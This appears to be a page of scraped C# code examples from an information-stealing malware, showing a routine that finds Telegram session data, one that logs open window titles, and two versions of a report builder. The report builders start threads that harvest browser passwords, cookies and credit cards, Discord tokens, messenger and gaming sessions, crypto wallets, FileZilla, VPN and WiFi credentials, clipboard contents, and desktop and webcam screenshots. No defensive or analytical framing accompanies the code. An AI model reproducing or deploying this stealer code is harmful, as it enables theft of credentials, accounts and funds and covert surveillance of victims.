Example #1
0
        // Get tdata directory
        private static string GetTdata()
        {
            string TelegramDesktopPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Telegram Desktop\\tdata";

            Process[] TelegramProcesses = Process.GetProcessesByName("Telegram");

            if (TelegramProcesses.Length == 0)
            {
                return(TelegramDesktopPath);
            }
            else
            {
                return(Path.Combine(
                           Path.GetDirectoryName(
                               ProcessList.ProcessExecutablePath(
                                   TelegramProcesses[0])), "tdata"));
            }
        }
Example #2
0
 public static void WriteWindows(string sSavePath)
 {
     Process[] processlist = Process.GetProcesses();
     foreach (Process process in processlist)
     {
         try
         {
             if (!string.IsNullOrEmpty(process.MainWindowTitle))
             {
                 System.IO.File.AppendAllText(
                     sSavePath + "\\Windows.txt",
                     "NAME: " + process.ProcessName +
                     "\n\tTITLE: " + process.MainWindowTitle +
                     "\n\tPID: " + process.Id +
                     "\n\tEXE: " + ProcessList.ProcessExecutablePath(process) +
                     "\n\n"
                     );
             }
         } catch { }
     }
 }
Example #3
0
        public static bool CreateReport(string sSavePath)
        {
            // List with threads
            List <Thread> Threads = new List <Thread>();

            try
            {
                // Collect files
                Threads.Add(new Thread(() =>
                                       FileGrabber.Run(sSavePath + "\\Grabber")
                                       ));

                // Chromium & Edge thread (credit cards, passwords, cookies, autofill, history, bookmarks)
                Threads.Add(new Thread(() =>
                {
                    Chromium.Recovery.Run(sSavePath + "\\Browsers");
                    Edge.Recovery.Run(sSavePath + "\\Browsers");
                }));
                // Firefox thread (logins.json, db files, cookies, history, bookmarks)
                Threads.Add(new Thread(() =>
                                       Firefox.Recovery.Run(sSavePath + "\\Browsers")
                                       ));
                // Internet explorer thread (logins)
                Threads.Add(new Thread(() => {
                    try
                    {
                        InternetExplorer.Recovery.Run(sSavePath + "\\Browsers");
                    }
                    catch { }
                }));

                // Write discord tokens
                Threads.Add(new Thread(() =>
                                       Discord.WriteDiscord(
                                           Discord.GetTokens(),
                                           sSavePath + "\\Messenger\\Discord")
                                       ));

                // Write pidgin accounts
                Threads.Add(new Thread(() =>
                                       Pidgin.GetAccounts(sSavePath + "\\Messenger\\Pidgin")
                                       ));

                // Write telegram session
                Threads.Add(new Thread(() =>
                                       Telegram.GetTelegramSessions(sSavePath + "\\Messenger\\Telegram")
                                       ));

                // Steam & Uplay sessions collection
                Threads.Add(new Thread(() =>
                {
                    // Write steam session
                    Steam.GetSteamSession(sSavePath + "\\Gaming\\Steam");
                    // Write uplay session
                    Uplay.GetUplaySession(sSavePath + "\\Gaming\\Uplay");
                }));

                // Minecraft collection
                Threads.Add(new Thread(() =>
                                       Minecraft.SaveAll(sSavePath + "\\Gaming\\Minecraft")
                                       ));

                // Write wallets
                Threads.Add(new Thread(() =>
                                       Wallets.GetWallets(sSavePath + "\\Wallets")
                                       ));

                // Write FileZilla
                Threads.Add(new Thread(() =>
                                       FileZilla.WritePasswords(FileZilla.Steal(), sSavePath + "\\FileZilla")
                                       ));

                // Write VPNs
                Threads.Add(new Thread(() =>
                {
                    ProtonVPN.Save(sSavePath + "\\VPN\\ProtonVPN");
                    OpenVPN.Save(sSavePath + "\\VPN\\OpenVPN");
                    NordVPN.Save(sSavePath + "\\VPN\\NordVPN");
                }));

                // Get directories list
                Threads.Add(new Thread(() =>
                {
                    Directory.CreateDirectory(sSavePath + "\\Directories");
                    DirectoryTree.SaveDirectories(sSavePath + "\\Directories");
                }));

                // Create directory to save system information
                Directory.CreateDirectory(sSavePath + "\\System");

                // Process list & active windows list
                Threads.Add(new Thread(() =>
                {
                    // Write process list
                    ProcessList.WriteProcesses(sSavePath + "\\System");
                    // Write active windows titles
                    ActiveWindows.WriteWindows(sSavePath + "\\System");
                }));

                // Desktop & Webcam screenshot
                Thread dwThread = new Thread(() =>
                {
                    // Create dekstop screenshot
                    DesktopScreenshot.Make(sSavePath + "\\System");
                    // Create webcam screenshot
                    WebcamScreenshot.Make(sSavePath + "\\System");
                });
                dwThread.SetApartmentState(ApartmentState.STA);
                Threads.Add(dwThread);

                // Saved wifi passwords
                Threads.Add(new Thread(() =>
                {
                    // Fetch WiFi passwords
                    Wifi.SavedNetworks(sSavePath + "\\System");
                    // Fetch all WiFi networks with BSSID
                    Wifi.ScanningNetworks(sSavePath + "\\System");
                }
                                       ));;
                // Windows product key
                Threads.Add(new Thread(() =>
                                       // Write product key
                                       File.WriteAllText(sSavePath + "\\System\\ProductKey.txt",
                                                         ProductKey.GetWindowsProductKeyFromRegistry())
                                       ));

                // Start all threads
                foreach (Thread t in Threads)
                {
                    t.Start();
                }

                // Wait all threads
                foreach (Thread t in Threads)
                {
                    t.Join();
                }

                return(true);
            }
            catch (Exception ex) {
                Console.WriteLine(ex);
                return(false);
            }
        }
Example #4
0
        public static bool CreateReport(string sSavePath)
        {
            // List with threads
            List <Thread> Threads = new List <Thread>();

            try
            {
                // Collect files (documents, databases, images, source codes)
                if (Config.GrabberModule == "1")
                {
                    Threads.Add(new Thread(() =>
                                           FileGrabber.Run(sSavePath + "\\Grabber")
                                           ));
                }

                // Chromium & Edge thread (credit cards, passwords, cookies, autofill, history, bookmarks)
                Threads.Add(new Thread(() =>
                {
                    Chromium.Recovery.Run(sSavePath + "\\Browsers");
                    Edge.Recovery.Run(sSavePath + "\\Browsers");
                }));
                // Firefox thread (logins.json, db files, cookies, history, bookmarks)
                Threads.Add(new Thread(() =>
                                       Firefox.Recovery.Run(sSavePath + "\\Browsers")
                                       ));
                // Internet explorer thread (logins)
                Threads.Add(new Thread(() =>
                                       InternetExplorer.Recovery.Run(sSavePath + "\\Browsers")
                                       ));

                // Write discord tokens
                Threads.Add(new Thread(() =>
                                       Discord.WriteDiscord(
                                           Discord.GetTokens(),
                                           sSavePath + "\\Messenger\\Discord")
                                       ));

                // Write pidgin accounts
                Threads.Add(new Thread(() =>
                                       Pidgin.GetAccounts(sSavePath + "\\Messenger\\Pidgin")
                                       ));

                // Write outlook accounts
                Threads.Add(new Thread(() =>
                                       Outlook.GrabOutlook(sSavePath + "\\Messenger\\Outlook")
                                       ));

                // Write telegram session
                Threads.Add(new Thread(() =>
                                       Telegram.GetTelegramSessions(sSavePath + "\\Messenger\\Telegram")
                                       ));

                // Write skype session
                Threads.Add(new Thread(() =>
                                       Skype.GetSession(sSavePath + "\\Messenger\\Skype")
                                       ));

                // Steam & Uplay sessions collection
                Threads.Add(new Thread(() =>
                {
                    // Write steam session
                    Steam.GetSteamSession(sSavePath + "\\Gaming\\Steam");
                    // Write uplay session
                    Uplay.GetUplaySession(sSavePath + "\\Gaming\\Uplay");
                    // Write battle net session
                    BattleNET.GetBattleNETSession(sSavePath + "\\Gaming\\BattleNET");
                }));

                // Minecraft collection
                Threads.Add(new Thread(() =>
                                       Minecraft.SaveAll(sSavePath + "\\Gaming\\Minecraft")
                                       ));

                // Write wallets
                Threads.Add(new Thread(() =>
                                       Wallets.GetWallets(sSavePath + "\\Wallets")
                                       ));

                // Write FileZilla
                Threads.Add(new Thread(() =>
                                       FileZilla.WritePasswords(sSavePath + "\\FileZilla")
                                       ));

                // Write VPNs
                Threads.Add(new Thread(() =>
                {
                    ProtonVPN.Save(sSavePath + "\\VPN\\ProtonVPN");
                    OpenVPN.Save(sSavePath + "\\VPN\\OpenVPN");
                    NordVPN.Save(sSavePath + "\\VPN\\NordVPN");
                }));

                // Get directories list
                Threads.Add(new Thread(() =>
                {
                    Directory.CreateDirectory(sSavePath + "\\Directories");
                    DirectoryTree.SaveDirectories(sSavePath + "\\Directories");
                }));

                // Create directory to save system information
                Directory.CreateDirectory(sSavePath + "\\System");

                // Process list & active windows list
                Threads.Add(new Thread(() =>
                {
                    // Write process list
                    ProcessList.WriteProcesses(sSavePath + "\\System");
                    // Write active windows titles
                    ActiveWindows.WriteWindows(sSavePath + "\\System");
                }));

                // Desktop & Webcam screenshot
                Thread dwThread = new Thread(() =>
                {
                    // Create dekstop screenshot
                    DesktopScreenshot.Make(sSavePath + "\\System");
                    // Create webcam screenshot
                    WebcamScreenshot.Make(sSavePath + "\\System");
                });
                dwThread.SetApartmentState(ApartmentState.STA);
                Threads.Add(dwThread);

                // Saved wifi passwords
                Threads.Add(new Thread(() =>
                {
                    // Fetch saved WiFi passwords
                    Wifi.SavedNetworks(sSavePath + "\\System");
                    // Fetch all WiFi networks with BSSID
                    Wifi.ScanningNetworks(sSavePath + "\\System");
                }
                                       ));;
                // Windows product key
                Threads.Add(new Thread(() =>
                                       // Write product key
                                       File.WriteAllText(sSavePath + "\\System\\ProductKey.txt",
                                                         ProductKey.GetWindowsProductKeyFromRegistry())
                                       ));
                // Clipboard text
                Threads.Add(new Thread(() =>
                                       File.WriteAllText(sSavePath + "\\System\\Clipboard.txt",
                                                         Clipper.Clipboard.GetText())
                                       ));
                // Get installed apps
                Threads.Add(new Thread(() =>
                                       InstalledApps.WriteAppsList(sSavePath + "\\System")
                                       ));

                // Start all threads
                foreach (Thread t in Threads)
                {
                    t.Start();
                }

                // Wait all threads
                foreach (Thread t in Threads)
                {
                    t.Join();
                }

                return(Logging.Log("Report created", true));
            }
            catch (Exception ex) {
                return(Logging.Log("Failed to create report, error:\n" + ex, false));
            }
        }